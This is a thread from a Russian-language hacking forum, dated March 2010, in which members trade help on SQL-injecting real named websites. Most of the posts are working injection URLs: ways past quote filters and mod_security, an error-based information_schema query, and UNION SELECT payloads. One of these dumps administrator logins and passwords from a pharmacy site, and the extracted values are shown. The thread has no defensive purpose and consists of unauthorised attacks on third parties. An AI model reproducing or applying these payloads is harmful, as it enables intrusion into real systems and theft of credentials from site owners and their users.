HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11881  
Старый 10.03.2010, 16:29
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от YuNi|[c  
карочи я вообще задолбался раскрутит эту скул:


никак не могу обходит фильтр кавычки, всё перепробовал

может кто посоветует обход
Цитата:
http://www.bourdela.tv/index.php?topic=2')and(1=1)--+
тоже одинаковый результат
 
Ответить с цитированием

  #11882  
Старый 10.03.2010, 17:39
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

2 Seravin:

mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)

http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html

почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь

а на что-то типо:

Код:
http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((select+version()),1,1))=53
он тебе и так по русски пишет - Warning, потому что неправильный синтаксис
 
Ответить с цитированием

  #11883  
Старый 10.03.2010, 17:41
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Цитата:
Сообщение от Pashkela  
2 Seravin:

mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)

http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html

почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь

а на что-то типо:

Код:
http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((select+version()),1,1))=53
он тебе и так по русски пишет - Warning, потому что неправильный синтаксис
там не form, а /*form*/, но за ответ спасибо, почитаю
 
Ответить с цитированием

  #11884  
Старый 10.03.2010, 17:48
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

YuNi|[c,
Цитата:
http://www.bourdela.tv/?'or(select+count(*)from(information_schema.column s)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/7,1)*'
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #11885  
Старый 10.03.2010, 18:22
Sharsky
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами: 8522087

Репутация: 0
По умолчанию

Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)

Вот запрос:

Цитата:
http://www.pharmabort.ru/page.php?id=-16%20and%20%28SELECT%20sipt%28concat%280x3b,login, password%29,1,1%29%20from%20users%20limit%200,1%29 =1
Логин и пасс админа не выводит...
 
Ответить с цитированием

  #11886  
Старый 10.03.2010, 19:20
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от Sharsky  
Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)

Вот запрос:



Логин и пасс админа не выводит...
Цитата:
http://www.pharmabort.ru/page.php?id=-15 UNION SELECT 1,2,3,concat(0x7e,pharma_admins.login,0x7e,pharma_ admins.password,0x7e,pharma_admins.name,0x7e),5,6, 7,8,9,10,11,12,13,14,15+FROM+pharmabort.pharma_adm ins+LIMIT+0,1--
~mooncat~sql~netservice~
LIMIT+1,1--
~cons1~cons~Консультант
 
Ответить с цитированием

  #11887  
Старый 10.03.2010, 19:30
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

уже не надо этот скул
 
Ответить с цитированием

  #11888  
Старый 10.03.2010, 20:09
Sharsky
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами: 8522087

Репутация: 0
По умолчанию

[Feldmarschall], ничего не выводит =(
 
Ответить с цитированием

  #11889  
Старый 10.03.2010, 20:27
Sharsky
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами: 8522087

Репутация: 0
По умолчанию

Удалил все пробели, все ровно не выводит. Вы проходили по ссыле? Посмотрите сами.
 
Ответить с цитированием

  #11890  
Старый 10.03.2010, 21:15
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Подскажите, почему не отображаются данные?
Код:
http://www.spbpost.ru/index.php?page_id=69+union+select+1,2,3,4,5,6,7,8,9,concat%28user%28%29,database%28%29%29,11,12,13,14,15,16,17+limit+1,1+--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...